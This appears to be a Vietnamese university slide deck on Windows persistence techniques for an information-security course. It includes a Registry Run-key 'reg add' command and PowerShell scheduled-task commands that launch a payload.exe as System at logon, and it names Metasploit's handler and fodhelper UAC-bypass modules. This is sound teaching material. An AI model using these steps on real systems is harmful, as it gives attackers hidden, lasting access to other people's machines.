Professional Documents
Culture Documents
Window Persistence
Window Persistence
Giảng viên :
TS Lại Minh Tuấn – Khoa An toàn thông tin
Page 1
Khái niệm và Ví Dụ
Window Persistence (Sự kiên trì của cửa sổ) là một khái niệm trong lĩnh vực an ninh
mạng và bảo mật máy tính. Nó thường ám chỉ đến các kỹ thuật và phương pháp để
thực hiện việc duy trì truy cập hoặc thâm nhập vào một hệ thống máy tính thông qua
việc cài đặt mã độc hoặc kỹ thuật tinh vi, giúp cho attacker (người tấn công) có thể
duy trì quyền truy cập vào hệ thống mà không bị phát hiện..
Ví dụ
Cài đặt dịch vụ tự khởi động
Thêm vào các khóa Registry
Thêm vào các tác vụ lên lịch
Chèn mã độc vào các tệp tin hệ thống
Sử dụng các kỹ thuật khai thác
Page 2
Chuẩn bị
Sử dụng msfvenom tạo payload
| Page 3
Chuẩn bị
Bật apache
| Page 4
Chuẩn bị
SSH
| Page 5
Registry
• reg add: Đây là lệnh để thêm một mục mới vào Registry.
• "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run":
Đây là đường dẫn tới khóa Registry
• /v "Payload": Đây là tùy chọn để chỉ định tên cho mục mới mà bạn đang thêm vào
• /t REG_SZ: Đây là tùy chọn để chỉ định kiểu dữ liệu của mục bạn đang thêm vào
• /d "C:\Users\Minh\AppData\payload.exe“:đường dẫn tới tệp thực thi
• /f: Đây là tùy chọn để yêu cầu xác nhận khi thêm mục mới vào Registry mà không cần
phải xác nhận từ phía người dùng.
| Page 6
Startup Folder
| Page 7
Leo thang lên System
Module exploit/multi/handler là một công cụ trong Metasploit được sử dụng để lắng nghe và
chấp nhận các kết nối từ các payload mà kẻ tấn công đã triển khai
| Page 8
Leo thang lên System
Module exploit/windows/local/bypassuac_fodhelper là một module trong framework Metasploit
được thiết kế để tận dụng lỗ hổng trong tính năng User Account Control (UAC) của hệ điều hành
Windows
| Page 9
Schedule Task
• $action = New-ScheduledTaskAction -Execute "C:\Users\Minh\AppData\payload.exe".:tạo một hành
động mới cho một tác vụ lên lịch (scheduled task).
• $trigger = New-ScheduledTaskTrigger –AtLogon.:tác vụ sẽ được kích hoạt khi một người dùng đăng
nhập vào hệ thống.
• Register-ScheduledTask -TaskName "PayloadTask" -Action $action -Trigger $trigger -User "System“: tác
vụ lên lịch với tên "PayloadTask", hành động thực thi tập tin "payload.exe" khi một người dùng đăng
nhập vào hệ thống
| Page 10
Window service và Create account
| Page 11
Cảm ơn Thầy cô và
các bạn đã lắng nghe